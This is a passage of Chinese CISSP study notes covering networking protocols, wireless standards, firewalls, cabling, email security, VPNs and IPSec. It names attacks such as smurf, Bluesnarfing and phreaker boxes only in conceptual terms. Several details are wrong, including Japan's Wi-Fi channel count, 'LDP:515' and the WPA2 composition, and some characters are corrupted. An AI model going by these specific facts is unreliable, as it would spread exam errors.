C->S: ACK 结束会话需要四次挥手:C->S: FIN S->C: ACK S->C:FIN C->S: ACK 。 另外一种中断会话的方法是RST包。 28、TCP较大的窗口,允许更快的数据传输速度。连接不可靠时,就会用 比较小的窗口。在发送窗口的所有数据包未接收完的情况下,不会发送 任何确认数据包。 29、TCP报头的长度为20字节~60字节,主要有16位源端口(2字节)、 16位目的端口(2字节)、32位序列号、4位数据偏移量、8位标志、16位 窗口大小、16位校验和、16位紧急指针和可变的各种32位的选项。 30、TCP的标识位有SYN、ACK、FIN、RST、URG、PSH等。IP包头中,表 示TCP的值为6。 31、使用嗅探器前,要有授权,否则视为安全违规行为。 32、UDP不ᨀ供错误纠正,不使用序列,不使用流量控制,不使用会话, 不可靠,系统开销很低,速度快。音视频等实时流式通信经常使用UDP。 33、UDP报头的长度为8个字节,源端口(2字节)、目的端口(2字节)、 报文长度(2字节)、校验和(2字节)。IP包头中,UDP的值为17。 34、IPv4使用32位寻址(4字节),IPv6使用128位寻址(16字节),IPv6 新功能包括域地址、自动配置(就不需要DHCP和NAT了)、QoS等。 35、IP等级(classes):A类子网支持16 777 214台主机,B类支持65534 台主机,C类支持254台主机,D类为多播,E类保留。 OSG书上没有的知识点: IPv6地址为128位长(16⫿节),但通常写作8组,每组2个⫿节。例 如:2001:0db8:85a3:08d3:1319:8a2e:0370:7344,如果四个数⫿都是零, 可以被省略。例如:2001:0db8:85a3:0000:1319:8a2e:0370:7344等价于 2001:0db8:85a3::1319:8a2e:0370:7344 遵从这些规则,如果因为省略而出现了两个以上的冒号的话,可以压 缩为一个,但这种零压缩在地址中只能出现一次。 IPv4 地址可以很容易的转化为IPv6格式。如果IPv4的一个地址为 135.75.43.52(十六进制为0x874B2B34),它可以被转化为 0000:0000:0000:0000:0000:0000:874B:2B34或者::874B:2B34。同时,还可 以使用混合符号(IPv4-compatible address),则地址可以为::135.75.43.52。 36、A类地址的127段留给环路地址,但事实上只用了一个地址。 37、子网划分的一种表示方法是无类别域间路由CIDR(Classless InterDomain Routing),采用掩码位表示,如172.16.1.1/16代替255.255.0.0. 38、ICMP(网络控制报文协议)用于确定网络的健康状况,ping、 traceroute、pathping等工具用了ICMP,经常被基于带宽的拒绝服务所利 用, ping of death发送大与65535字节的包 smurf通过欺骗对目标网络产生大流量 ping flood是基本的DoS攻击 IP包头表示ICMP的值为1。 39、注意,当UDP目的端口不可用时,对方会发一个ICMP类型3的报文回 来,表明目的不可达。(因为UDP自身没有手段发送错误) 40、IGMP(网络组管理协议)允许多播。IP包头中表示IGMP的值为2。 41、常见端口 SMTP:25 POP3:110 IMAP:143 DHCP,67、68 TFTP的端口为69 NFS:2049 SNMP:使用UDP 161、162(Trap) LDP:515 42、IMAP比POP3更安全,也是邮件客户端的协议,能从邮件服务器取包 头,能够远程直接从服务器删除邮件。 43、协议的分层,FTP可以在一个只允许HTTP的环境下绕过限制: [Ethernet[IP[TCP[HTTP[FTP]]]]] Loki这种工具可以将TCP封装在ICMP里面: [Eth[IP[ICMP[TCP[HTTP]]]]] 多层协议的缺点:允许隐蔽信道、绕过过滤机制、网络边界被逾越 (多层VLAN标签导致跨越VLAN),好处:灵活、不同层次合作。 44、DNP3(分布式网络协议)是 CISSP CBK 专门ᨀ出的与多层协议相关 的内容。DNP3类似TCP/IP,有链路层和传输层,主要用于电力和水利行 业的使用,包含子站计算机、远程终端单元(RTU、嵌入式)、智能电子 设备(IED)和SCADA主站(控制中心)。 45、某些NIC支持MAC地址变化,大多数现代OS也支持这一点(在内存中 变化)。 46、汇聚协议(converged protocol),汇聚协议是把专有协议融合到像 TCP/IP这样的标准协议上。好处是复用现有的网络基础设施,成本低。比 如:FCoE(Fibre channel over Ethernet),在以太网上封装光纤通道FC协 议,让SAN存储设备的FC请求和数据可以通过以太网连接来传输,而无需 专门的FC结构,从而可以在以太网上传输SAN数据。FCoE这种架构下,只 是用了TCP/IP的第二层及以下,光纤通道替换了IP。 47、MPLS(多协议标签交换)是一种高吞吐率高性能的网络技术,传输 数据时基于最短路径标签而不是基于更长的网络地址,节省了基于IP的 路由过程。MPLS可以和多种协议封装。 48、iSCSI,是基于IP的网络存储标准,是FC的低成本替代方案。 49、VoIP是在TCP/IP上传输语音,已经取代或具备取代PSTN的潜力。VoIP 还支持视频。 50、SDN的概念旨在把控制层(网络的数据传输管理)和基础设施层 (即硬件)分离。从中央位置编程,网络设备可以标准化和通用化(白 盒交换机)。数据的传输路径、通信决策树以及流量控制都在SDN层处 理,而不是由每个设备的硬件来计算。 51、CDN(内容分发网络)通过分布式数据主机ᨀ供多媒体性能质量, ᨀ供低延迟、高性能和高可用性,CDN是一种地理和逻辑负载均衡的结 果。一般都是基于地理,但基于客户的CDN也是可能的(P2P就是这样), 最被广泛认可的P2P CDN是BitTorrent。 52、无线网络之所以不安全,主要是因为最终用户和组织缺乏知识以及 设备制造商ᨀ供的不安全默认配置。 53、当电子移动时就会发生泄露。电子运动产生电磁场。如果能读到电 磁场的话,可以在其他地方再次创造,以便复制电子流。这种形式的电 子窃听听起来像科幻小说,但却是科学事实。美国政府从 20 世纪 50 年 代一直以来都在 TEMPEST 项目下研究电磁泄漏安全。 54、802.11是IEEE关于无线网络通信的标准,802.11X用来泛指整个协议 族,但注意千万不要和802.1x混淆了,后者是认证技术。 802.11(2M) 802.11a(54M) 用5G 802.11b(11M) 用2.4G 802.11g(54M) 用2.4G 802.11n(200M) 用2.4G和5G,n有两种频率 802.11ac(1G) 用5G 55、部署无线网络时,要部署基础设施模式(Infrastructure mode)而不 是ad hoc模式(或称P2P模式),后者意味着任意两个无线设备都可以互 相通信。前者意味着AP只是一个接入点。 56、基础设施模式也有好几种形式: 独立模式(stand alone)不ᨀ供有线资源,仅仅ᨀ供无线hub; 有线扩展模式ᨀ供有线网络接入; 企业扩展模式是指多个AP连接巨大的物理区域到一个有线网络; 桥接模式通常在有线桥接不方便时,比如在两个建筑物之间使用专用 的无线桥接器把网络连接起来。 57、SSID有两种,扩展服务集标识符ESSID(extended service set ID, ESSID),基本服务集ID(Basic service set ID,BSSID), ESSID是无线基站或WAP的名称(也即基础设施模式)。 BSSID是ad hoc模式或称P2P模式的名称。 在基础设施模式下运行时,BSSID是ESSID基站主机的MAC地址,用来区 分一个扩展无线网络下的多个基站。 58、无线信号可以有多个信道,美国有11个频道,欧洲有13个,日本有 17个。相邻信道中的无线信号会互相干扰。 59、出于安全考虑,SSID应该禁用以保持私密性。但即便如此,攻击者 可以用无线嗅探器发现客户端和WAP之间的SSID,所以并不是真正的安 全机制。应该使用WPA2这种真正的认证+加密的解决方案。 60、执行现场勘测(Site Survey):用于发现不需要无线接入的物理环境 区域。调查在环境中部署无线接入点所需的信号强度。这项任务通常包 括携带便携式无线设备进行现场行走观察,留意无线信号的强度,并据 此在建筑图上进行标注。响应地,还会最大限度地减少或消除不允许无 线接入位置(公共区域、跨楼层、其他房间或建筑外)的无线信号。 61、IEEE802.11定义了验证客户端的方法: 开放系统(Open System Authentication,OSA)、OSA就是不用认证 共享密钥认证(Shared Key Authentication,SKA),SKA有WEP、WPA、 WPA2。 62、WEPᨀ供和有线等级别的安全性,能够防止嗅探,防止非授权访问。 预定义静态的共享密钥,使用HASHᨀ供完整性保护。 在WEP中,知晓密钥就可以加密通信,同时也是一种基本的身份认证, 没有密钥就进不了网络,目前,可以在不到一分钟时间就破解WEP。 WEP使用RC4流密码算法,但RC4在设计上和实现上有缺陷,WEP的弱 点在于使用静态的公共密钥和薄弱的IV(初始向量)。 63、WPA被设计用来替代WEP,基于TKIP或LEAP(轻量级可扩展认证协议, 是Cisco专有的,用于替代TKIP)加密体系,本来是临时的,但后来一直 在使用。 64、WPA的缺点:一方面,WPA所使用的单个静态口令容易遭受暴力猜 解,另一方面,LEAP和TKIP都能用不同的技术破解,所以WPA不ᨀ供长 期可靠的安全。 65、802.11i是专门用来代替WEP的,但WPA这个名字已经被使用了,所 以802.11i没法再用这个计划中的名字,只能叫WPA2了,而实际上,这是 完全不同的技术。 66、802.11i或WPA2实现了类似IPSec的概念。使用CCMP协议替代了TKIP, CCMP也即计数器模式密码块链接消息认证码协议(counter mode cipher block chaining message authentication code protocol,也即(Counter CBCMAC Protocol)),是基于AES加密,Counter模式实现了加密,CBC-MAC 实现了完整性认证。目前看来,尚无实际的攻击能破坏WPA2。 67、 可以这样认为: WPA = IEEE 802.11i draft 3 =IEEE802.1X/EAP+WEP(选择性项目)/TKIP WPA2 = IEEE 802.11i = IEEE 802.1X/EAP+WEP(选择性项目)/TKIP/CCMP 68、如果基站有外部的全向天线,通常应该垂直定位。全向天线, omnidirectional atena,标准的直杆天线,垂直于天线本身收发信号,也 被称为基础天线或橡胶天线(rubber duck)。 69、如果使用定向天线,则是专注于某个方向收发信号,如Yagi天线,类 似传统的屋顶电视天线,再如cantenna天线、面板天线、抛物线天线。 定向天线应该指向所需要的区域。设计安全网络时,工程师可以选择 定向天线,以避免在不希望的区域ᨀ供广播信号。 70、使用强制门户(captive portals):将新连接的无线WEB客户端重新 定向到强制门户访问控制页面。也被用来显示使用策略、隐私策略和跟 踪策略。用户必须同意才能进入网络。 71、一般的wifi安全措施还包括: Change the default administrator password. Disable the SSID broadcast. Change the SSID to something unique. 客户端较少时,启用MAC过滤; 使用静态IP; 使用802.1x; 使用防火墙把无线网和有线网隔离起来; 使用IDS监控无线网到有线网的流量; 在无线客户端和WAP之间使用VPN加密。 72、通常,添加WPA2和IPSec VPN这样的加密层次,使无线链路降低高达 80%的有效吞吐量。此外,如果离基站较远,或者存在干扰,将进一步 减少有效吞吐量。 73、有一个技术的合集,通常称为战争驾驶(wardriving),用于发现使 用中的无线网络。攻击者可以发现隐藏的SSID,活动的IP,有效的MAC, 然后用专门的破解工具,试图会话劫持或者中间人攻击。 74、内部网(Intranet)是专有网络(Private network),外人不可访问。 外部网(Extranet)是互联网和内部网之间的中间网络,外部网里面的服 务可以供给合作伙伴使用,供公共消费的外部网被标记为DMZ区。 75、网络隔离(segment)的目的: 1、ᨀ高性能(经常通信的在一个网段) 2、减少通信(减少广播风暴) 3、ᨀ高安全性(隔离数据流,需要用户接入认证) 分隔的手段主要是VLAN、路由器、防火墙。私有局域网、intranet、 extranet、DMZ都是网络隔离的类型。 76、网络接入控制(NAC)的目标: 1、预防/减少0-day攻击(别人进不来) 2、加强网络通信的安全策略 3、使用身份认证完成入网 802.1x用于实现NAC,但802.1x事实上只是NAC的一部分。 NAC有进入前评估和进入后评估,前者说的是装了补丁和杀毒软件才能 更新,后者是基于其行为可以拒绝访问。 77、大多数防火墙ᨀ供基本的入侵检测。除了记录网络通信活动,还要 记录: 1、防火墙的启动 2、无法启动的代理或服务 3、崩溃或重启动的代理或服务 4、防火墙配置文件的更改 5、防火墙运行时配置错误或系统错误 防火墙故障往往是人为错误和不当配置造成的。 78、防火墙有4种:静态包过滤防火墙、应用级网关防火墙、电路级网关 防火墙、状态检测防火墙。 1、静态包过滤防火墙:第一代防火墙,在第3层工作。关注源目地址 和端口。容易受到虚假数据包的欺骗。 2、应用级网关防火墙:也称代理防火墙,每个数据包都要经过检查和 代理,性能不强,是第二代防火墙,在第7层工作。 3、电路级网关防火墙:在会话层(第5层)工作,使用socks(socket secure)协议(说是电路级(circuit-level),其实是个通信电路的比喻, 是在会话层),只基于通信电路的终点(源目地址、服务端口号)来许 可或转发,仍被视为第二代防火墙。 4、状态检测防火墙:对网络通信的状态进行监测,比应用级网关防火 墙更有效,视为第三代防火墙,通常在第3层和第4层工作。 79、多宿主防火墙,至少有多个接口, 堡垒主机(屏蔽主机)只是位于专用网络和不可信网络之间的防火墙 系统。 屏蔽子网(DMZ)和屏蔽主机的概念相似,位于两个路由器之间,所 有入站通信都定向到堡垒主机,只有堡垒主机代理的通信才能通过第二 个路由器进入专用网络。 80、防火墙部署的体系结构:可以看到,DMZ既可以位于一个防火墙的 一个接口上,也可以在两个串联的防火墙之间。对于三层部署,中间那 个事务处理子网,里面放的是web应用服务器。这种最安全。注意Twotier的两种形式,Three-Tier的两种形式。 81、终端安全:“终端设备要为自己的安全负责”。 82、关于冲突和广播 冲突域是指域内成员如果同时发送数据信号,就会冲突(冲突域外部 的就不会冲突)。 广播域是指一个成员发送广播信号,域内所有成员都收到(广播域外 部的就不会收到)。 83、第二层设备(及以上)可以分隔冲突域,但仍可在相通的广播域。 第三层设备(及以上)可以分隔广播域和冲突域。 84、Repeaters、Concentrators、Amplifiers都工作在第1层,这些设备两侧 都位于相同的冲突域和广播域。hub集线器也工作在第1层,两侧也都在 相同的冲突域和广播域。 85、调制解调器后来被ISDN、DSL modem、cable modem、wireless等形式 所替代,这些现代设备其实都已经是做路由器了。 86、桥工作在第2层,作用是将两个网络连接在一起,目的是使用相同的 第2层协议(即便是不同第1层),使用不同速率的桥可以缓存数据包, 然后把数据包转发到较慢的网络,这成为存储转发设备。桥的两侧在相 同的广播域,但冲突域不同。 87、交换机工作在第2层,如果交换机有路由功能,也可在第3层工作 (可在VLAN之间路由)。 广播只能在一个VLAN中。第2层交换机两侧可以位于同一广播域(考虑 VLAN)。但冲突域不同。 第3层交换机,其两侧的系统位于不同的广播域和冲突域。 88、路由器工作在第3层,两侧属于不同的广播域和冲突域。桥式路由器 (Brouter)主要工作在第3层,尝试路由如果失败就工作在第2层。如果 工作在第3层,两侧就不同的广播域和冲突域,如果工作在第2层,两侧 就相同的广播域不同的冲突域。桥式路由器连接使用相同协议的网段。 89、网关工作在第7层,连接使用不同协议的网络。代理是一种不要在协 议之间转换的网关,代理能够充当中介、过滤、缓存、NAT/PAT。 90、LAN扩展(LAN extenders)是通过WAN连接远距离网络,经销商通常 不愿意说WAN,原因是WAN有点复杂了。 91、网络故障的最常见原因是线路故障或配置错误。 92、同轴电缆(coaxial cable)已经被双绞线(低廉而且安装简便)替代。 同轴电缆中心是一根铜线被绝缘物质包着、然后被导电编织屏蔽物包着、 然后被最外面绝缘皮包着的东西,需要50欧姆网段终结器,有粗缆 (10Base5,可扩展到500米距离,10M吞吐率)和细缆(10Base2,扩展 到185米,10M吞吐率)两种。 93、双绞线由4对线缆组成,包在PVC绝缘皮内。如果里面有一层金属箔 纸片,那就是屏蔽双绞线(STP,shield twisted-pair),可以防范EMI,如 果没有就是UTP。 94、UTP就是10Base-T(3类线10M)、100Base-T(5类100M,5e类线 1000M)、1000Base-T(6类线1G),7类线能到10G(短距离内),(1 类线主要适用于语音和调制解调器的,2类用于大型主机、4类用于令牌 环)。这些现在都是过时的技术。T代表双绞线,然后距离为100米。 95、双绞线里面的铜线是成对绞在一起的,这样可以免受外部无线电和 电磁干扰, 线缆中的每个线对都以不同的程度进行缠绕(也就是每英寸距离内进 行缠绕),这样当信号在一对线上传递时,就不会交错到另一对线上。 缠绕得越紧(每英寸进行的缠绕越多),那么对内部和外部干扰以及 串扰的屏蔽也就越强,因此吞吐的能力也就越大(也就是说,具有更大 的带宽)。 96、双绞线的常见问题: 使用错误的线类型(category)来完成高吞吐连接; 双绞线长度超过了最大长度100米(T就是100米); 在干扰大的情况下错误使用了UTP(而没用STP)。 97、铜线对电流存在电阻,所以长了以后会有信号强度衰减问题;传输 速率越高,衰减越严重,所以高速要用短线;距离长了可以使用中继器 或集中器,连续使用的中继器不能多于4个;阻燃线缆在燃烧时不会释放 毒烟; 89、光线传输的是光脉冲,速率快,几乎不会收到窃听和干扰。然而安 装困难、价格昂贵。 98、网络几种拓扑:环形(ring)、总线型(bus)、星型(star)、网状 型(mesh)。 99、环形用的是令牌,令牌绕着环走,谁有令牌谁能传输数据,数据和 令牌也都是按照环来绕,每个节点都看看是不是给自己的数据,不是就 放行,直到目的地,收取数据,继续绕行令牌。会出现单点故障的问题, 容错机制就是反向运行的双环。 100、总线型(Bus)拓扑所有系统可以同时传输数据,会导致冲突,所 以要侦听,如果侦听到通信,就会等待片刻再侦听。没有通信时才传输 数据。物理上的总线结构已经很少使用,因为容易出现断网,而且两端 要有终结器。总线拓扑分为两种,线型和树形。 101、星型拓扑(Star)采用了集中式连接设备,可以是一个hub或者交 换机,hub会成为单点故障。 102、以太网基于总线技术,虽然物理上是星型的,但是集线器设备实际 上是逻辑总线连接设备。 令牌环是基于环的技术,它可以通过使用多站访问部件 (Multistation Access Unit, MAU)被部署为一个物理的星型拓扑结构,同 时以内部的设备形成逻辑环连接。 103、网状型拓扑(Mesh Topology)的冗余性很好。 104、无线通信。无线电的频率从3hz到300Ghz,由于900M、2.4G、5G频 率是免执照的,所以这几种频率在无线产品中是最常见的。 105、跳频扩频(Frequency Hopping Spread Spectrum,FHSS)不断改变所 使用的频率,不是以并行形式使用可用频率,而是使用串行方式不断改 变频率,可以最小化干扰。 直接序列扩频(Direct Sequence Spread Spectrum,DSSS)以并行方式同 时使用所有可用频率,ᨀ供了更高的数据吞吐率,使用碎片码(chipping code )的编码机制重构数据,抗干扰能力也强。 正交频分复用(Orthogonal Frequency-Division Multiplexing,OFDM)采 用了更紧密压缩的多载波调制技术,已调制信号是正交的,因此不会导 致相互干扰。所以,OFDM 需要的带宽更小,却能够ᨀ供更大的数据吞 吐率。 106、蜂窝电话(Cell Phone) 第一代是模拟技术 2G是数⫿技术(GSM、TDMA、CDMA), 2.5G(GPRS) 3G(W-CDMA、TD-CDMA、EDGE) 3.5G(HSPDA) 4G(LTE,WiMAX) 107、蜂窝电话的关键问题: 可以被窃听,所以传输的语音、文本、数据都不一定是安全的, 基站可以被伪造,被中间人攻击。 蜂窝电话连接互联网和办公网,成为办公内网潜在的网桥。 108、我们不可能从运营商那里获得真正的端到端保护,美国的通信协助 法律实施法案(CALEA)授权,只要有warrant,电信公司必须能够允许 窃听语音和数据通信。即便链路加密,中间也要解开成明文供窃听。 109、无线应用协议(Wireless Application Protocol,WAP)不是一个标准, 而是一个功能行业驱动的协议栈。使用WTLS来实现类似TLS的功能。注意, 不要和无线接入点里面的WAP相混淆。 110、蓝牙使用2.4Ghz的频率,问题是4位的PIN码并不安全(更不要说默 认的0000)。 111、Bluejacking使得攻击者可以给你的设备发送类似SMS的消息。 Bluesnarfing能够在你不知情的情况下配对你的设备,访问你的联系人 列表、你的数据、甚至是你的通话。 snarf:vt.很快地吃喝,贪婪地吃喝 Bluebugging可以让黑客远程控制你的设备,可以打开你的麦克风进行 音频监控。 112、幸运的是,蓝牙通常只具有 30 英尺(10米)的限定范围,不过某 些设备在 100 米之外也能够运作。 113、蓝牙使用了加密,但并不是动态加密,可以破解;蓝牙适合非敏感 的活动。 114、只要有可能,最好修改设备的默认 PIN。不要使设备停留在发现模 式,在没有活动使用时总是关闭蓝牙。 115、无绳电话(cordless phone)使用的是免执照频率,信号极少加密, 容易被窃听。使用频率扫᧿仪即可窃听。 116、不在移动设备上保存敏感信息是十分重要的。在公共场合应该谨慎 的使用手机谈论。 117、LAN技术有三种类型:以太网、令牌环、FDDI。 以太网是共享介质的广播技术,支持全双工通信。 令牌环已经很少使用。 FDDI是一种使用两个环的高速令牌传递技术,两个环使用相反的方向 传输。常用作大型企业网络的主干,双环设计允许实现自愈,一旦有网 段坏掉,可以用剩下的内环和外环建立单个环。在快速以太网和千兆以 太网出现之前经常用在校园环境里。铜线版为CDDI,容易被干扰和窃听。 118、长距离传输或存在干扰时,数字信号比模拟信号更可靠。模拟通信 通过频率、幅度、相位、电压来传输信号,数字通信使用非连续的电子 信号或开关脉冲。 同步通信依赖时钟,适合高速传输,异步通信依赖停止位、开始位来 界定,适合少量数据的传输。 119、LAN介质访问技术: CSMA(Carrier-Sense Multiple Access)载波侦听多路存取,如果侦听发现 介质没有被使用,就传输通信数据,这种技术只是侦听,并不解决冲突, 如果发生冲突,就不成功。 CSMA/CA(Collision Avoidance)带有冲突避免的载波侦听多路存取,如果 侦听发现介质没有被使用,主机会向主系统请求特权,通过特权来避免 冲突,AppleTalk和802.11使用这个。 CSMA/CD(Collision Detection)带有冲突检测的载波侦听多路存取,侦听 介质是否可用,发送数据同时也侦听冲突,如果冲突就发送一个停发信 号,然后所有主机都会停止数据传输,每台主机都会等待一个随机的时 间再发。以太网使用了这个技术,但这会损失40%左右的潜在吞吐量。 120、LAN介质访问技术: 令牌传递,如FDDI使用此技术。 轮徇,这是主从配置的,一个系统为主系统,需要轮徇各从系统是否 需要传输数据,如果需要,就授予特权,SDLC使用这个。 轮徇时可以给某个系统更高的优先权, 比如轮徇顺序:1,2,1,3,1,4 121、EAP(可扩展认证协议)是一个认证框架,允许新的认证技术与现 有的技术兼容。PEAP(受保护的可扩展认证协议)通过TLS隧道封装EAP。 第12章 安全通信和网络攻击 1、一些常见的安全通信协议: IP简单密钥管理(Simole Key Management for Internet Protocol, SKIP),与IPSec相结合,在1998年被IKE替代。所以在第3层工作。 软件IP加密(swIPe),也在第3层工作; 安全远程过程调用(S-RPC)防止在远程系统上未经授权的情况下执行 代码;应用层的协议。 安全套接⫿(SSL)面向会话,提供机密性和完整性,使用40位密钥或 128位密钥。 安全电子交易(SET)的基础是RSA和DES,没有被互联网广泛接受。 2、传输层安全(TLS)类似SSL,支持单向认证,如果使用数⫿证书,则 支持双向认证,通常是TCP包头后的第一层数据。 TLS还能加密UDP,还能加密SIP,SIP和VoIP有关。 3、TLS可以被用在第三层作为VPN,这就是openVPN的原理。OpenVpn是 开源软件,技术核心是虚拟网卡,使用openssl实现。 4、身份认证协议也有很多,以下这三种(CHAP、PAP、EAP)最初都是 用在拨号PPP连接上,现在很多连接都用这些协议与其他较新的协议。 挑战握手身份认证协议(Challenge Handshake Authentication Protocol,CHAP)是 在PPP链接上使用的一种身份认证协议,CHAP对用户名密码加密,通过挑战响应 防重放攻击,并且可以定期对远程系统认证,这个活动对用户透明。 密码身份认证协议(Password Authentication Protocol,PAP)也适用于PPP的标 准身份认证协议,PAP以明文形式传递用户名密码,不提供加密。 可扩展身份认证协议(Extensible Authentication Protocol,EAP)是一种身份认 证架构,可以支持自定义身份认证的安全解决方案,如智能卡、令牌和生物测定 学。 受保护的可扩展认证协议(PEAP)将EAP封装在TLS里面。EAP假设信道已经被 保护,PEAP实施自己的安全措施。PEAP可以应用在wifi的WPA和WPA2上。PEAP 优于LEAP,LEAP可以被Asleap破解。 5、VoIP将语音封装成IP数据包,在实现上,有些系统是纯明文的,也有 是被加密的。 黑客攻击方式:呼叫ID可能被伪造(类似垃圾邮件);管理系统和电 话本身容易遭受OS攻击和DoS攻击;中间人攻击;被窃听。 6、公司里面的人容易受到社会工程学攻击,人类的特点:对别人的基本 信任、懒惰、忽略差异、心不在焉、遵从命令、以为别人知道很多、愿 意帮助人、害怕受训斥等等。 7、要知道如何应对只有语音的沟通:语音显得奇怪、不恰当、意外时, 要谨慎。 应该要求对方ᨀ供身份证明,比如要身份证号码; 回叫(callback)授权,服务器会打到预定义号码上获得授权; 明确语音通信中可以讨论什么; 如果有人在电话中要秘密信息,要询问他为什么要这些信息,并在此 验证其身份,而且要报告给安全管理员; 永远不要通过只有语音的方式分发密码; 安全的销毁办公室文档,尤其是里面含有IT基础设施及安全机制的相关 信息。 8、飞客(Phreaker)滥用电话系统,攻击PBX系统用于躲避收费和隐藏 自己的身份。对PBX安全改善是直接拨入系统访问(Direct Inward System Access,DISA),主要是给用户分配access code,但这很危险,黑客一旦 知道,就会滥用,拨入公司然后打免费的长途电话。 9、飞客工具:有色盒, 黑盒:操纵电线的电压,窃取长途服务。 红盒:模拟硬币投入电话机的声音,通常是小录音机。 蓝盒:模拟2600Hz的拨号音,哨子或录音。 白盒:双音多频(DTMF)生成器,也就是拨号面盘,可以是自制的, 也可以是电话修理人员用的。 记忆:黑电压、红录音机、蓝哨子、白音频。 10、IM的问题:容易遭窃听,缺乏本地安全功能,通过文件传输感染病 毒,用户经常容易被社会工程学攻击。 11、电子邮件:客户端通过POP3或者IMAP收邮件,通过SMTP发邮件。 大多数电邮系统依赖X.400标准addressing和message handling。SMTP不要 做成开放中继代理,容易成为垃圾邮件发送者的目标。 12、电子邮件安全性的目标:ᨀ供不可否认性、ᨀ供机密性(使得只有 意定读者才能读)、维护完整性、邮件源的身份认证、验证邮件的传送 过程、对内容和附件进行分类,邮件的备份和保管。这些安全策略都应 该由高级管理人员批准。 13、无论是被授权的还是未被授权的,没有任何人可以访问他人的个人 电子邮箱(指的是前台进入,而不是审计人员在后台查看)。 14、用户应该了解电子邮件是否是保密的通信,电子邮件如果备份和存 档,也要让用户知道,如果审计人员查看电子邮件是否违规,也要通知 用户,否则用户会非常恼火。一些公司保存3个月,一些公司保存数年。 15、电子邮件的源地址欺骗是轻而易举的,可以在源头修改,也可以在 传输的任何位置修改,另外还可以连接邮件服务器的SMTP端口将邮件直 接传送到该服务器上的用户收件箱(特快专递)。 16、电子邮件安全性解决方案:S/MIME,MOSS,PEM,DKIM,PGP 17、安全多用途互联网邮件扩展(S/MIME)通过公钥加密和数字签名ᨀ 供安全性,通过数字证书ᨀ供身份认证,通过公钥密码学标准PKCSᨀ供 加密。MIME是指Multipurpose Internet Mail Extensions。 18、S/MIMEᨀ供两种类型的邮件:签名邮件(signed messages)和安全 封装邮件(secured enveloped messages),前者ᨀ供完整性和发送者身 份认证,后者ᨀ供完整性、机密性和发送者身份认证。 19、MIME对象安全服务(MOSS),使用MD2、MD5、RSA、DES,ᨀ供 身份认证、机密性、完整性。 20、隐私增强邮件(PEM),使用RSA、DES、X.509ᨀ供身份认证、完整 性、机密性和不可否认性。 21、域名密钥识别邮件标准(DKIM),域名服务器ᨀ供域名机构的公钥, 发送方服务器在电子邮件的头部插入DKIM-Signature签名,接收方通过 DNS查询得到公钥后验证。显然,这可以防范虚假的邮件地址后缀, DKIM允许一个机构对邮件负责(当然它不是用来认证发送者的)。 22、良好隐私(PGP)使用多种加密算法对文件和电子邮件进行加密。 PGP是商业产品、OpenPGP是一个正在开发的标准,GnuPG遵从这个标准 而且被FSF(Free Software Foundation )支持。 23、传真的安全性:传真也可以被截获,并且容易被偷听,如果记录下 完整的传真通信,就可以在另一台传真机重放,从而得到文档。 可以使用传真加密器(在传真机内部加密)、链路加密、行为日 志、异常报告。 24、传真的安全性:自动打印的传真打出来没取走被他人看到,文件上 如果加上Confidential、private反而会激发他人的好奇心,所以一定不要 自动打印。 避免让传真机把已打印图像存在内存里。考虑将传真系统和电子邮件 系统结合,不打印纸质件而是发邮件给接收者。 25、远程访问的要求:访问前应该严格认证;只有确有必要的人才允许; 加密; 26、远程访问带来的问题:远程工作者的电脑可能不安全、有毒、没打 补丁。 27、拨号协议:PPP是全双工协议,工作在2层,是一种封装协议,用在 各种非LAN的连接上传输TCP/IP包,比如在调制解调器拨号连接上、ISDN、 VPN、FR上。PPPᨀ供多种通信服务,包括IP地址分配、复用、差错检测、 压缩等等,PPP可以采用多种认证协议来认证,PPP是SLIP的替代协议, 上层可以支持IP和IP外的其他LAN协议(如IPX、DECnet)。(SLIP较旧, 只支持IP协议,只支持半双工、没有身份认证、不能差错检测,需要静 态IP,不支持压缩。) 28、远程的身份认证协议:RADIUS、TACACS+。RADIUS主要是查看拨号 用户的登录凭证。 TACACS有三种版本,TACACS、XTACACS(扩展)、TACACS+。 TACACS有身份认证和授权功能; XTACACS将身份认证、授权和可问责相分离; TACACS+增加了双因素认证能力。 29、大多数VPN都使用了加密,但VPN未必一定要加密。 30、VPNᨀ供机密性和完整性,但并不保证可用性。隧道就是封装而已, 在通信两端封装和拆装,在不可信的中间网络上建立起虚拟的路径。 31、隧道技术无所不在,每当使用TLS访问网站的时候,其实明文WEB数 据就通过隧道技术装入TLS会话。对于VoIP来说,就是语音装入了互联网 隧道。 32、隧道技术的问题:开销大,效率变低;是点对点机制,所以没有考 虑对广播信号的处理;监控流量变的困难。 33、PPTP、L2F、L2TP在第2层工作。PPTP只用在IP网络中,L2F和L2TP可 以封装任何LAN协议。 34、PPTP(点到点隧道协议)是从PPP开发出来的封装协议,封装PPP包, 使用CHAP、MS-CHAP、PAP、EAP、SPAP等协议完成身份认证(这些也是 PPP支持的身份认证协议)。PPTP最初的隧道协商过程不加密,可能被截 获用户和散列密码,PPTP不支持TACACS+和RADIUS;PPTP常常被L2TP替 代。 35、L2F不ᨀ供加密,很快被L2TP取代。 36、L2TP其实是PPTP和L2F的组合,缺乏内置的加密方案,所以经常和 IPSec结合,L2TP支持TACACS+和RADIUS。 37、IPSec既是一个独立的VPN协议,又是L2TP的安全机制。主要有身份 认证头AH和封装安全有效载荷(ESP), AHᨀ供完整性、数据源认证(来自于对IP包头的认证)、防重放,当 认证头使用非对称数字签名算法(如RSA)时,AH还可以ᨀ供不可否认 性; ESPᨀ供机密性、完整性、有限的数据源认证(认证尾里,如果隧道模 式含有IP包头的信息)、防重放。 38、AH和ESP都可以用传输模式和隧道模式。 39、传输模式中,不对IP包头加密,AH头或ESP头在原来的IP头后面; 40、隧道模式中,对整个IP数据包都加密了,然后外面有个新的IP包头, 然后才是AH头或ESP头,然后是原先的IP头。 41、AH头里的序列号用来防重放,里面的MAC用来认证这个IP包的完整 性,包括IP数据和IP包头的部分内容。 42、ESP头对ESP头部后面的数据加密,认证的范围也仅限数据,不包括 IP包头(除非用隧道模式),ESP在有效载荷后面还有一个认证报尾,用 来做完整性检查(对ESP头、有效载荷,ESP尾),报尾也是被加密的。 43、虚拟局域网(VLAN)在网络上进行逻辑隔离而不改变其物理拓扑。 默认情况下,交换机上的所有端口都属于VLN#1,同一个网络上可以有多 个VLAN。 不同VLAN之间可以通过路由功能支持或拒绝。路由可以由外部的路由 器ᨀ供或者三层交换机ᨀ供。 默认情况下,不同VLAN是不通的。也可以设为都通的,对指定的 VLAN拒绝。VLAN可以防止广播风暴。 44、私有VLAN(Private VLAN or port-isolated VLAN)可以让一个私有 VLAN里面的成员互相通信,可以仅仅通过预定的出口上行,而不能和其 